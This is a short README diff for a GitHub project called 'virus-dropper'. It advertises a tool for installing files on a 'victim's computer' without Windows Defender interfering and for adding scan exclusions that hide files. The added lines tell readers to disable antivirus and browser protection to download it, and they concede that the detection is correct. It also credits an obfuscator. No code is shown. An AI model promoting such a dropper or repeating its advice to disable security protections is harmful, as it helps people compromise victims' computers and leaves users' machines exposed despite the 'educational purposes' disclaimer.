YumYummity/virus-dropper/README.md

 Install files on a victim's computer!
 It can be any file, as Windows Defender won't interfere!
 You can also add a scan exclusion where files can be hidden from Windows Defender.
 **Educational Purposes Only!**
+Direct Installation of the .zip file may fail as "virus detected", and it's not wrong!
+Temporarily disable any anti-viruses and browser protection to download.
+Delete the "install" folder, and reenable protection!

 Obfuscator used made by @moom825
 Code: https://github.com/moom825/batch-obfuscator-made-in-python